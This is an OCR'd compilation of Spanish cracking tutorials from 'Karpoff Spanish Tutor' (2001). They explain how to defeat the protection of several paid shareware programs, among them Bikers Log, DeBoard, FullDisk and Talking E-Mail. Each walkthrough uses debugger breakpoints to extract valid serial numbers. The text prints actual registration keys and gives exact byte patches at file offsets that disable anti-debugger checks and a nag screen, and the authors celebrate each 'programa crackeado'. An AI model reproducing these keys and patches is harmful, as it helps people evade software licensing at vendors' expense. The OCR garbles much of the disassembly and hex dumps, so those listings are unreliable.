programa y lo que ahora debemos hacer es ir a la caja de registro, poner el e-mail, cualquier número de 
registro y darle click a OK, y como hemos puesto el breakpoint el Softl CE romperá nuevamente dejándonos 
aquí... 


C684248400000001 BYTE PTR [ESP+00000084], 01 

E8332E0100 0041840 <=== caemos aquí, le damos una vez a F10 
85C0 FAX, EAX <=== ? edx = NÚMERO DE SERIE VÁLIDO 
7454 00405705 

8D4C246C E ECX, [ESP+6C] 


51 ECX 


B978164B00 ECX,004B1678 
E86CF30400 00454A2C 


Al colocar ? edx en el TEST 004056AD veremos esto: 

0000118633 

Ya tenemos nuestro número de registro válido, en mi caso la caja quedaría así... 
E-mail adress: actmagoO hotmail.com 

Registration key: 118633 


Le damos click a OK y... 


[ mp3 - explorer ] 


hanks for registering [ mp3 - explorer ]! 


La caja de registro no sólo recibe tu correo electrónico, también puedes registrar el programa con tu nombre. 


Programa crackeado... 


Nota: 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoGU'hotmail.com 


| Saludos | 


e ProOfEsOr X ( my best friend ) 


e [KRaViTZ] ( suerte amigo ) 
e [ DeK_OIiN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http: //www.tntcrackers.ws 


e ViPER ( creador de file insPEctor ) file insPEctor web site http: //www.finspec. swsites.net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo. 


| Chao!! | 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero 
recuerden, lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Act MagO 24 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: — Bikers Log v3.5 


PROTECCION: Serial. 

Objetivo: Quitar el anti-Softl CE, desempacar, encontrar el código de registro 
Descripcion: 

Dificultad: cracker con experiencia 

DOWNLOAD: http: //www.techmarc.co.uk 

Herramientas: file insPEctor, W32Dasm, ProcDump, Frogs!lCE, UnAspack v1.0.9.1, Hex Workshop 
CRACKER: Act Mago FECHA: 15/04/2001 


INTRODUCCION 


Hola amigos, presento mi vigésimo tercer tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 

actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. En 
este tutorial usaremos el SoftlCE. Si no lo tienes instalado puedes bajártelo en www.crackstore.com . Asumo que 
tienes conocimientos básicos sobre su uso. Y para terminar con la INTRO debo decir : ESTE TEXTO HA SIDO 
ESCRITO SOLO CON PROPOSITOS EDUCACIONALES. 


AL ATAKE 


Comentario del Programa | 


Programa para ciclistas que sirve para documentar todos los detalles de un corredor. 


Lo que nos interesa... el programa es distribuido como shareware limitado a 15 corredores y para tener la versión full 
del programa debes registrarte y para eso pagar la suma de $30 dólares. 


Pero eso tiene solución porque contamos con un pelotón de excelentes herramientas :) ... 


| Manos a la Obra 


Antes de abrir el programa lo analizamos con file insPEctor v3.5 el que nos mostrará información realmente importante 
a la hora de atacar el programa; bueno el file insPEctor nos mostrará lo siguiente: 


e El programa está empacado con ASPack v1.08.04 
A continuación... cerramos file insPEctor v3.5 y abrimos Bikers Log v3.5 


Mmm, le damos doble click y no pasa nada... el programa no carga y por casualidad tengo cargado el Softl CE, por lo 
que podemos determinar que el programa está protegido contra el Softl CE... y para estar 100% seguros echamos a 
andar el FrogslCE y curiosamente el programa ahora si carga; en conclusión: 


Ya tenemos dos problemas que resolver: 


e El programa está empacado 
e El programa indudablemente tiene protección ANTI -Softl CE 


Ahora dentro del programa vamos a la caja de registro presionando un enorme botón que se ve a simple vista; una vez 
que estamos en la caja insertamos lo que sea y vemos esto... 


Invalid Unlock Code. 


El código de registro lo podemos conseguir fácilmente con el Softl CE, pero vamos por parte: lo primero que debemos 
hacer es desempacar el programa para quitarle la protección ANTI-Softl CE, porque imagínense cargando el Frogsl CE 
cada vez que van a usar el programa, sería un plomazo enorme. 


A continuación... cerramos Bikers Log v3.5 y abrimos UnAspack v1.0.9.1 


| Desempacando 


Abrimos el UnAspack, le damos click al botón que tiene los tres puntitos para buscar el ejecutable del programa 
(Biker.exe), una vez que lo hemos encontrado presionamos Unpack y el programa será desempacado rápidamente 
(yo he quedado sorprendido), para asegurarnos de que ha hecho su trabajo de forma satisfactoria lo analizamos 
nuevamente (Biker.exe) con el file insPEctor, el que ahora puede reconocer el compilador sin el paquete: 


e Borland/Inprise Delphi 4 


Seguimos en el file insPEctor, presionamos la lengúeta que dice Secciones para constatar de que todo esté bien, y 
ahora que estamos en Secciones nos damos cuenta que en Characteristics no hay ningún E0000020, todos son 
C0000040 y por lo que yo tengo entendido debe haber al menos un E0000020 para poder desensamblarlo 
correctamente. 


A continuación... cerramos file insPEctor y abrimos ProcDump 


Fino 7] 


Ya en el ProcDump presionamos PE Editor y buscamos el ejecutable del programa (Biker.exe) una vez encontrado 
nos aparecerá el cuadro PE Structure Editor presionamos el botón Sections y una vez que estamos ahí, hacemos 
click con el botón derecho del mouse en la sección CODE para que nos aparezca el menú y luego click en Edit Section 
para llegar al lugar que nos interesa Modify section value. Al frente de Section Characteristics y abajo del RVA y 
el Offset está lo que buscamos: CO000040. 


Lo modificamos dejándolo en: EO0000020 


A continuación... cerramos el ProcDump y abrimos el W32Dasm 


Usando el W32Dasm | 


Abrimos W32Dasm y luego nos vamos a la opción Disassembler > Open File to Disassemble... buscamos la 
carpeta en donde está instalado el programa y abrimos el archivo Biker.exe 


El archivo ha demorado mucho tiempo en desensamblarse , pero una vez desensamblado el archivo vamos a Refs > 
String Data References y buscamos las marcas del ANTI -Softl CE: se verá algo así... 


"[Date]>" 
"[Date]>=" 
dí 

"[YY]" 

ps" 
NAS 
"NV ANTI CE” 
"NA SICE" 
"highlight" 


Son dos y están juntas, creo que por el nombre no hay duda de lo que hacen, ahora le damos doble click a la primera 
para caer aquí... 


:006DE81D 6880000000 push 00000080 
:006DE822 6A03 push 00000003 
:006DE824 6A00 push 00000000 
:006DE826 6A03 push 00000003 
:006DE828 68000000C0 push C0000000 


* Possible StringData Ref from Code Obj ->"AX.ANTICE" 


:006DE82D 6848E86D00 push 006DE848 


* Reference To: kernel32.CreateFileA, Ord:0000h 


:006DE832 E8D596D2FF Call 00407F0C 

:006DE837 83F8FF cmp eax, FFFFFFEFF 

:006DE83A 7408 je 006DE844 <== la zona caliente :) 
:006DE83C 50 push eax 


Ya vamos teniendo una idea de lo que debemos hacer... ahora le damos doble click a la segunda para caer aquí... 


:006DE7E1 6880000000 push 00000080 
:006DE7E6 6A03 push 00000003 
:006DE7E8 6A00 push 00000000 
:OO6DE7EA 6A03 push 00000003 
:006DE7EC 68000000C0 push C0000000 


* Possible StringData Ref from Code Obj ->"AX.ASICE" 


:006DE7F1 680CE86D00 push 006DE80C 


* Reference To: kernel32.CreateFileA, Ord:0000h 


:O006DE7F6 E81197D2FF Call 00407F0C 

:O06DE7FB 83F8FF cmp eax, FEFFFFFEFEF 

:O06DE7FE 7408 je 006DE808 <== otra zona caliente :) 
:006DE800 50 push eax 


El asunto es simple: ambos saltos son JE (salta si es igual), pero si tenemos cargado el Softl CE el valor no es igual y 
obviamente estos no saltarán , por lo tanto el programa no se iniciará porque ha encontrado al Softl CE, entonces lo 
que debemos hacer es cambiar los saltos para que estos siempre salten sin importar el valor que tengan, cambiar los 
JE a JUMP, es decir: 


e El primer salto: 
ORI GI NAL 
:006DE83A 7408 je 006DE844 
PARCHADO 
:006DE83A EB08 jump 006DE844 
e El segundo salto: 
ORI GI NAL 
:O006DE7FE 7408 je 006DE808 
PARCHADO 
:O006DE7FE EB08 jump 006DE808 
Ahora buscamos los offsets de los saltos en la parte inferior del W32Dasm, se verá algo así... 


El primero: 


Line:1502630 Pg 18783 and 18784 of 18803 Code Data O:006DE83A GOffset 002DDC3A in File: Biker.exe 


El segundo: 


Line:1502572 Pg 18782 and 18783 of 18803 Code Data O:006DE7FE OOffset 002DDBFE in File: Biker.exe 


Anotamos ambos offsets (2DDC3A;2DDBFE) para ir al Hex Workshop y hacerle una cirugía menor al programa para 
quitarle la protección ANTI -Softl CE. 


A continuación... cerramos W32Dasm y abrimos Hex Workshop 


| Parchando el ANTI-SoftlCE 


Abrimos el Hex Workshop y vamos a File > Open... y buscamos el ejecutable del programa (Biker.exe), y una vez 
que lo hemos encontrado vamos a Edit > Goto... insertamos el primer offset y cambiamos el 7408 a EBO8, y luego 
hacemos lo mismo con el segundo offset. Guardamos los cambios y listo!! PROTECCION ANTI -Softl CE anulada. 


| Buscando el código de registro 


Mmm, parecía una protección por lo menos casi digna, pero mientras analizaba el listado muerto del programa en el 
W32Dasm me encontré con una sorpresa en las String Data References, la que luce así... 


'"7SNN" 

"7SS" 

"7SSS" 

"ng" 

"977-0956-38806" 

"9999" 

"9| nvalid BLOB field count in data " 
"A primary index is already defined " 
"A riders name can not contain " 


Parece un código de registro, no? :) ya lo hemos encontrado, ahora sólo debemos ir a la caja de registro e insertarlo 
977-0956-38806 y... 


Bikers Log Successfully Unlocked. 


Lamentablemente estos tipos se preocuparon del Softl CE, pero no se preocuparon de esconder el código de registro en 
un lugar seguro :), se confiaron demasiado en el ASPack y ellos mejor que nadie deberían saber que toda protección 
tarde o temprano será crackeada. 


Programa crackeado... 


a] 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoG'hotmail. com 


| Saludos 


e PrEfEsOr X ( my best friend ) 
e [KRaViTZ] ( suerte amigo ) 


e [ DeK_OIiN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers.ws 


e VIPER ( creador de file insPEctor ) file insPEctor web site http: //www.finspec.swsites. net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo. 


| Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, 
lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Act MagO 23 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


DeBoard Video Display Software 2/8/2001 


Name / Serial. 


Buscar Un serial Valido 


Principiante 
htt://www.internetsoftwareshop.com/apps/deboard.exe 
Softice 


SiLvEr StOrM FECHA: 6/04/2001 


INTRODUCCION 


Welcome to everybody....hay me equivoque de idioma...bueno mi 4to tutorial.. creo que estoy mejorando.. 
gracias a todos Uds..., espero que lo entiendan y les sea util. Recuerden que este tutorial esta hecho con 


fines netamente educativos si les interesa este Programa COMPRENLO, (aunque a mi parecer este 
programa es extremadamente caro... 200$. 


AL ATAKE 


Comentario del Programa 


e El programa que elegimos es un aaahhhhhhhhhhh... me da flojera traducir todo esto... se los dejo como tarea.. 


e PC Graphic Video Display System for any occasion. This is a Scrolling/Crawling-4 monitor Software 
A PC video display system for any presentation. DeBoard supports up to four different monitors or four different video outputs at the 
same time with four different contents! Because DeBoard is thread based you can adjust the scroll, crawl and image box speeds to 
match your needs. The NT version can play AVI files and graphic images while scrolling. DeBoard also provides images wipes, anti- 
aliased text, page flips, temperature probe capabilities and much much more. Once the program is configured it is very easy to use and 
maintain. Includes a file transfer program to upload text files while remote DeBoard is running 

e Costoso : 200$ 


Objetivos 
1. Buscar un serial Valido 


Manos a la Obra 


Primero instalaremos nuestro programa: y luego lo ejecutamos. 


SiLvEr StOrh 
11213 14 15 16 17 f8 


AA —Á 


TextFile3 loaded : DISCLAIM. txt CAárchivos de programa +DAS-Digitrax Services DAS DeBoardsS ample.SFG 


Presionamos Register : y nos aparece una pantalla como la anterior. 
Introducimos nuestros Datos:EJ. name:SiLvEr StOrM 


y un serial de 8 caracteres:12345678 


A BusKar El Zeryal 


Ok.. 


Aqui comenzamos el trabajo duro.... me llevo como 20 minutos revisando todos estos registros... por cierto tengo algo importante que hacer regreso en unos 
minutos... ZZZZZZLZZLZZZZZZLZZZZ... 


a h hH.. ya regrese... a ver por donde quedamos.... ok.. ya vi... perfekto 
como siempre Presionamos "CONTROL D" y usaremos el bpx mas usado.... digo por mi... 


BPX HMEMCPY enter... y "CONTROL D"” para salir de Sice... 
y Presionamos REGISTER .... 


veremos como sale de nuevo SICE a ayudarnos en nuestra labor.... 
Quitamos los bp bd * enter 
Presionamos F12 


Presionamos 79 veces F10 


y estaremos aqui en el codigo del programa 


015F:0071ECE8 ?? 9? 9? 9? 9? 92 92 22-92 92 92 92 9 YI ici 
015F:0071ECF8 22 22 22 22 22 22 22 22-22 22.22 22 92 22 22M ncccnnnon 
A A A PROT32- 


0157:0043505C CALL USER32!'CallWindowProcA 2 
0157:00435061 MOV [EBX+0C],EAX DS:0061ED4C=00000000 <------ caemos aqui... 
0157:00435064 MOV EAX,[EBX] 
0157:00435066 CMP EAX,0C 
0157:00435069 JNZ 00435086 
0157:0043506B MOV EDX,[EBX+08] 
0157:0043506E PUSH EDX 
0157:0043506F MOV ECX,[EBX+04] 
0157:00435072 MOV EDX,EAX 
0157:00435074 MOV EAX,ESI 
0157:00435076 CALL 0043119C 
0157:0043507B JMP 00435086 
0157:0043507D MOV EDX,EBX 
0157:0043507F MOV EAX,ESI 


0157:00435081 CALL 004327B0 


0157:00435086 POP EBP < > 


De aqui en adelante empezamos a ver todos lo que tiene contenido en el registro EDX (d edx) 
la primera vez veremos nuestro numero (12345678) 
seguimos bajando dentro del codigo con F10 hasta que en otro EDX veremos nuestro nombre (el que introdugimos anteriormente) 


a ed bitéssssessid PROBE 
015F:0061EDB5 53 69 4C 76 45 72 20 53-74 4F 72 4D 00 00 00 00 SiLvEr StOrM..... 
015F:0061EDCS5 00 00 00 00 00 00 00 00-00 00 00 00 00 00 0000 ................ 
015F:0061EDDS 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00.00 ................ y 
A PROT32- 

0157:004890A1 LEA EDX.[EBP-0128] " 

0157:004890A7 CALL 00408430 * 

0157:004890AC MOV EDX,[EBP-0128] 

0157:004890B2 LEA EAX,[EBP-0104] 

0157:004890B8 MOV ECX.000000FF 

0157:004890BD CALL 004041B8 

0157:004890C2 LEA EDX,[EBP-0104] SS:0061EDB4=4C69530C <-------- aqui en edx (d edx) 


0157:004890C8 XOR ECX,ECX 


0157:004890CA MOV EAX,[EBX+000002FC] 
0157:004890D0 CALL 00464CDC 
0157:004890D3 LEA EDX,[EBP-04] 
0157:004890D8 MOV EAX,[EBX+000002C4] 
0157:004890DE CALL 004315C8 
0157:004890E3 MOV EAX,[EBP-04] 
0157:004890E6 LEA EDX,[EBP-0128] v 


0157:004890EC CALL 00408430 < > v 


Presionamos 4 veces mas ElO ... calma no se apuren... ya se que eso de estar contando es fastidioso. 
decirles a Uds. cuantas veces hay que presionar esta tecla... la verdad perdi la cuenta como 10 veces 


No se les olvide que estamos viendo en EDX... 


015F:0061ECDO 09 24 33 43 39 30 34 31-31 46 00 00 3C ED 61 09 .$3C90411F..<.a.? 
015F:0061ECEO0 24 36 44 44 30 36 30 32-46 0C 53 69 4C 76 45 72 $6DD0602F.SiLvEr” 
015F:0061ECFO0 20 53 74 4F 72 4D 0B 0B-0B 0B 0B 0B 0B 0B 0B 0B StOrM.......... 
015F:0061ED00 OB 0B 0B 0B 0B 0B 0B 0B-0B 0B 0B 0B 0B 0B 0B OB ................ 
015F:0061ED10 0B 0B 0B 0B 0B 0B 0B 0B-0B 0B 0B 0B 09 24 36 36 ............. $66 


015F:0061ED20 44 44 35 32 46 31 0C 53-69 4C 76 45 72 20 53 74 DD52F1.SiLvEr St 


. pero imaginenme a mi contando para 
.. . Creo que ya aprendi a contar .. Jee Jeee 


015F:0061ED30 4F 72 4D 0B 0B 0B 0B 0B-0B 0B 0B 0B 0B 0B 0B 0B OrM............. 


015F:0061ED40 0B 0B 0B 0B 0B 0B 0B 0B-0B 0B 0B 0B 0B 0B 0B 0B ................ y 
015F:0061ED50 0B OB 0B 0B 0B 0B 0B 0B-0B 09 24 36 36 44 44 35 .......... $66DD5v 
A PROT32- 


0157:004890A1 LEA EDX,[EBP-0128] 
0157:004890A7 CALL 00408430 

0157:004890AC MOV EDX,[EBP-0128] 

0157:004890B2 LEA EAX,[EBP-0104] 

0157:004890B8 MOV ECX,000000FF 

0157:004890BD CALL 004041B8 

0157:004890C2 LEA EDX,[EBP-0104] <------------ es aqui......... ya dejen de presionar F10.. ALTO.... 
0157:004890C8 XOR ECX,ECX 

0157:004890CA MOV EAX,[EBX+000002FC] v 


0157:004890D0 CALL 00464CDC < > v 


Anotamos ese numerito... (el que vemos en EDX) 
Salimos de SiCe... "CONTROL D 


Introducimos ese numerito... y .. Que paso... no funciono... 


SI, SIFUNCIONO:::: 
Otro programa mas crackeado... 


AH se me olvidaba decirles... este programa cuando lo registras crea un archivo con extenxion .key...si borran este archivo tienen que 
introducir de nuevo la clave de activacion... 


nO0TAS 


Este mismo esquema lo usan todos los programas de esta casa de software asi que pueden practicar con todos ellos. 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 
Saludos 


e Profesor_x 


e Toda la gente de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr StOrM_ 2001 EChotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


| FullDisk v3.1 


Tipo de Manual Eliminar un molesto NAG 


CRACKER: RuL FECHA: 04/04/2001 


INTRODUCCION 


NOMBRE del PROGRAMA: Ful/Disk 
Version: 3.1 
Tamaño: 99'5 Kb 
Protección: NAG-SCREEN 
URL: ¿2 
Dificultad Moderada 
Herramientas utilizadas: Softlce, W32dasm 8.9, Hexview y file-inPEctor (opc.) 


Se trata de un programita muy sencillo (y no por ello barato) que nos informa del espacion que nos queda 
disponible en el disco duro, de cuanto ocupa cada directorio, y varias cosas más. 
Si no encontrais el archivo para poder practicar con él, mandadme un mail y os lo pasaré, y si tenéis alguna duda 
no dudeis en escribirme, solo quiero una cosa NO ME PIDAIS CRACKS (http://astalavista.boxX.sk) 


RuL- rulzgz(dpunkass.com - 4/4/2001 


AL ATAKE 


:: 12 APROXIMACIÓN :: 


| Lo primero de todo es recabar información acerca de nuestro objetivo, usando el file inPEctor vemos ke esta programado en Visual 
C++ 4.2 y ke no está ni encriptao ni nada (mejor pa nosotros :) 


Observando el programa me doy kuenta de ke no hay ninguna opción desabilitada, lo uniko ke fastidia de no tener registrado el 
programa (10$ me parece mucho para lo ke hace el programa :) es un NAG kada vez ke salimos del programa, asi ke he decidido ir 
a por el NAG directamente, no intentar registrar el programa, mas que nada porke kasi nunca he crackeao NAGs y me llama más la 

atención. 


:: VAMOS A POR EL NAG :: 


Lo primero de todo desemsamblamos el ejecutable con W32dasm, y miramos un poko por encima. Y en la primera parte del kodigo 
veo algo MUY interesante (de casualidad :): 


A A 4444 DIALOG INFORMATION 444++4+4++444++4+++ // Fijaros en esta seccion 

[....] 

Name: DialoglD_0067, + of Controls=006, Caption:"How did you like FullDisk?", ClassName:"" // ¿Os suena? 

001 - ControllD:0002, Control Class:"BUTTON" Control Text:"Tell me more now" // :) 

002 - ControllD:0001, Control Class:"BUTTON" Control Text:"I will register soon" // Exacto!! es exactamente lo ke pone en el NAG 
003 - ControllD:FFFF, Control Class:"STATIC" Control Text:"Send comments to the Author," 

004 - ControllD:FFFF, Control Class:"BUTTON" Control Text:"" 

| 005 - ControllD:FFFF, Control Class:"BUTTON" Control Text:"" 


| Bueno ahora tenemos que buscar donde se usa esto, para eso pulsamos el Botón Dialog References (al lado de Str Ref) y 
| hacemos doble click en "Dialog: DialoglD_0067", esto lo repetimos varias veces para ver si hay mas de una referencia y en efecto, 
hay 3: 


¡* Possible Reference to Dialog: DialoglD_0067 


| 
:00402415 6A67 push 00000067 // Apuntamos 00402415 


* Possible Reference to Dialog: DialoglD_0067 


| 
:00403163 6A67 push 00000067 // Apuntamos 00403163 


| * Possible Reference to Dialog: DialoglD_0067 
Ñ 
| :00409735 6A67 push 00000067 // Apuntamos 00409735 


Mu bien ahora tenemos ke sabes kual es el kausante del NAG kuando salimos, asi ke abrimos en SYMBOL LOADER (Softlce) , 
abrimos nuestro ejecutable y le damos a Load despues de un mensaje de error (no os preocupeis, sale SIEMPRE) aparecemos en 
el Softlce (a partir de ahora lo llamare Sl ). Komo no sabemos kon seguridad kual de los tres es el ke provoca nuestra NAG, ni cortos 
ni perezosos le klavamos 3 Breakpoints :) 


Bpx 00402415 
Bpx 00403163 
Bpx 00409735 


Echo esto pulsamos F5 y volvemos ha windows, el programa esta ejecutandose asi ke lo cerramos y !!Eurekaj¡¡ Salta uno de los 
breakpoints ke hemos kolokao, exactamente el de 00409735. 


Bueno ya sabemos kual de los tres es el kulpable, ahora debemos encontrar el lugar exacto donde se genera el NAG, asi ke 
komenzamos a Tracear con F10, hasta ke en una CALL bastante alejada, aparece nuestra NAG, exactamente en esta: 


015F:0040262C E83DA30000 Call 0040C96E 


| Umm, interesante pero todavia no es definitivo por lo k tendremos ke ahondar un poko más :) borramos todos los Breackpoints (Bc *) 
y ponemos 

Bpx 0040262C y reiniciamos el proceso, te recuerdo: Cargamos el ejecutable con el Symbol Loader, pulsamos F5 y cerramos el 

ejecutable para ke aparezca el NAG. Al hacer esto salta de nuevo el SI en el CALL anterior, tenemos ke seguir traceando solo ke 

ahora en vez de usar F10 (ejecuta todo el CALL de tiron) usaremos F8 ke es igual ke F10 solo ke ejecuta las instrucciones de la 


CALL paso a paso. 


Pues eso pulsamos F8 y ya estamos dentro de la CALL, ahora ke ya estamos dentro del CALL usamos F10 y traceamos como 
antes, esta vez aparece el NAG al pasar por..... pero ke **** pasa!!? ke es eso!!?? 


Si os fijais en la linea de abajo pone algo asi, pos esto simplemente indica ke el ultimo JMP saltaba a MFC40.DLL :) asi ke el primer 
CALL (00402620) es el ke nos interesa parchear asi ke al tajo :) 


:: VAMOS A PARCHEAR :: 


Parece claro lo ke hay ke hacer ,no?¿ Lo primero ke tenemos ke kalkular es el OFFSET (recuerda ke lo ke sabemos el la direccion 
RVA, es decir, la dirección en memoria) para averiguarlo usaremos file insPEctor. 


Le damos a Abrir Archivo seleccionamos fulldisk.exe y le damos a Analizar, Seleccionamos la pestaña Herramientas y en donde 
pone RVA to OFFSET escribimos: 


0040262C == pulsamos boton ==> 00001A2C 
RVA ==============> OFFSET 


Mu bien ahora ya podemos parchear eso :) pero primero kiero ke os fijeis en una kosa, si entrais en el HEXVIEW y os limitais a 
NOPear (cambiar E83DA30000 por 9090909090 (90 es la instruccion NO OPeration en hexadecimal)) no funsionará por lo siguiente, 
fijemonos en ejecutable desemsamblado: 


:0040262C E83DA30000 Call 0040C96E // CALL ke genera nuestro NAG 
:00402631 83F801 cmp eax, 00000001 // Aki kompara EAX con 1, espera ke despues del CALL salga con 0 o 1 asi ke si nopeamos 


lo anterior EAX llega 
:00402634 0F850B000000 ¡ne 00402645 // aki con el valor ke tuviera antes, lo ke podria hacer ke se kolgara el ordenador 


Asi ke tenemos ke hacer ke EAX llegue ahi con valor 1 (si EAX=1 sale), y ¿komo lo hacemos? pos sencillo, poniendo en lugar del 
CALL la instruccion 
Mov EAX, 00000001 esto en hexadecimal es B801000000 (nos viene muy bien) 


Asi ke abrimos Hexview o kualkier otro editor hexadecimal y en el OFFSET 1A2C cambiamos E83DA30000 por B801000000 y listo 
:) 


:: SALUDOS :: 


Mr.Silver - [thEpOpE] - Karpoff - Mr.Nobody - Albrto - MORkO - Webon - ZiB - Snaper - BloodyMer - nano_ -etc.... 
y por supuesto a la gente de HAtRiO y Hcrackers del irc.hispano.org 


Cracked By RuL :: rulzgzfGpunkass.com 


"Pensais que todo tiene un límite, asi estais todos... LIMITADOS" - ESKORBUTO 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Email "Colabora con tus Proyectos" 


Ingenieria Inversa y Programacion. 


Karpoff Spanish Tutor 
e Talking E-Mail v 3.0 


PROTECCION: Name/serial 

Objetivo: Buscar un Numero de Serie Valido 

Descripcion: Programa para recuperar archivos borrados. 

Dificultad: Principiante 

DOWNLOAD: http://www.4Adevelopers.com/ 

Herramientas: Softece v4.0 

CRACKER: Profesor_X FECHA: 15/04/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un numero de 
serie valido para el Talking E-Mail v 3.0 de la empresa 4developers que se especializa en 
desarrollar utilerias para windows algunas muy buenas ........ como podran ver 
aumente una nueva seccion que se llama : VALORACION DEL SOFTWARE en la cual 
pondremos la calificacion que se merece segun mi punto de vista, tomando en cuenta 
los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e El show de hoy estara a cargo de un programa que a mi parecer es bueno para quienes gustan de que la Pcera les hable 
cuando llegue un E-mail, tiene muy buenas caracteristicas el Talking E-Mail v 3.0 , es bueno bajenlo y usenlo......yo tenia 
pensado hacer un solo tutorial para mostrales como se desprotegen todos los sharewares de esta empresa pero me lleve 
un chasco cuando quise ver otro shareware que ofrecen, . que decidi hacer un tutorial para cada uno..... 


Objetivos 
1. Buscar un Numero de serie valido 


Manos a la Obra (Metodo 1 ) 


Bueno amigos empezemos con este Taco de Cochinita Pibil !!!! J EJ EJ EJ EJ ..... lo primero que haremos es analizar el programa 
para ver si esta empakado y en que lenguaje fue hecho, con la herramienta llamada Lenguaje 2000 y nos mostrara esto: 


$ C Archivos de programaleT alk1T alkMail exe 


mmmm....como podemos ver esta hecho en visual Basic v 5.0 y no esta empacado ni nada de nada. ..jejeje.... continuemos...... 
ahora abramos el programa y nos aparecera una ventana como esta: 


Talking E-mail - UNREGISTERED VERSION 


CTE) 


la que nos dice que es una version Trial y que tenemos 14 dias para probarlo, insertamos un nombre y numero de serie y damos 


click en UNLOCK y nos manda el siguiente mensaje: 


UNREGISTERED User 


X 


OK! ahora vamos y reiniciamos la Pcera con el Soft Ice, y ponemos un breakpoint en __ VBASTRCMP y !!!! QUE no te 
acepta el breakpoint ? .... jejejejje para que te lo acepte debes de abrir el WINICE.DAT y añadir en la seccion que aparece 
abajo, las lineas de color anaranjado, estas son para que acepte las funciones de Visual Basic.... 


EN OOO IOIÓN 


; If your have MORE than 32MB of physical memory installed, change 
; the PHYSMB line to the correct + of Megabytes. 

; If you have LESS than 32MB you can save a bit of memory by 

; specifying the correct ++ of Megabytes 

; Example: PHYSMB=32 

q IEA e e e e e e e e e le e ll ll 
EXP=c:Wwindowsisystemikernel32.d1l 
EXP=c.Wwindowsisystemiuser32.dll 
EXP=cWwindowsisystemigdi32.dll 
EXP=cWwindowsisystemicomdlg32.dll 
EXP=c:Wwindowsisystemishell32.dll 
EXP=c:Wwindowsisystemishel1232.d11 
EXP=CAwindowslsystemiadvapi32.dll 
EXP=C:Wwindowsisystemivb40032.dll ;<--VB4 runtime file 
EXP=C:Wwindowsisystemimsvbvm50.dll ;<--VB5 runtime file 
EXP=C:Wwindowsisystemimsvbvm60.dll ;<--VB5 runtime file 


... jejejje --- damos CONTROL D 


otra vez y regresamos al programa, damos click en UNLOCKy saltamos directamente al Soft Ice y damos F12 una sola vez y caemos 


en esta parte del codigo : 


PROT32- 
0167:00453FC0 FF1594134800 CALL [MSVBVM50!__ vbasStrCmp] e 
0167:00453FC6 85C0 TEST EAX, EAX $ 
0167:00453FC8 7528 JINZ 00453FF2 
0167:00453FCA 8B16 MOV EDX, [ESI] 
0167:00453FCC. 56 PUSH ESI 
0167:00453FCD FF92FC060000 CALL [EDX+000006FC] 
0167:00453FD3  3BC3 CMP EAX, EBX 
0167:00453FD5 0F8D48020000 JGE 00454223 
0167:00453FDB 68FC060000 PUSH 000006Fc 
0167:00453FE0 68489F4100 PUSH 00419F48 
0167:00453FE5 56 PUSH ESI 
0167:00453FE6 50 PUSH EAX 
0167:00453FE7 FF150C134800 CALL [MSVBVM50!__vbaHresultCheckO0b3|] 
0167:00453FED E931020000 JMP 00454223 
0167:00453FF2 8D45E0 LEA EAX, [EBP-20] 
0167:00453FF5 8D4DD8 LEA ECX, [EBP-28] 


TALKMAIL! .text+00052FC0 


caemos en 0167:00453FC6 85C0 TEST EAX,EAX ahi damos D EDX y nos aparecera la siguiente informacion en la ventana de datos : 


016F:004C5D0C 00320031 00340033 00360035 00380037 1.2.3.4.5.6.7.8. 
016F:004C5D1C 00390039 00000000 00000000 A0000024 RA 5... a 
016F:004C5D2C 00000014 00320031 00340033 00360035 E AS E 
016F:004C5D3C 00380037 00390039 00000000 01000000 E A 


016F:004C5D4C A0000024 00000016 00650047 00540074 tato G.e.t.T. 
016F:004C5D5C 00700079 00490065 0066006E 0000006F y.p.e.I.n.f.o 
016F:004C5D6C 0000003D A0000034 TFBDABBO 004C76E0 A 8127; .vL. 
016F:004C5D7C 00000001 004C59B0 004C5ACO 004C5EE4 ——— ..... Yi. 2 Di De 
016F:004C5D8C 004C5AF8 00000000 00020400 00000000 LV te taa 
016F:004C5D9C 000000CO 46000000 A0000028 00000024 ——-—- ....... F(...$ 
016F:004C5DAC 00000000 00000000 00000000 00000000 —-—-—-—- ...oocoooooooo.... 
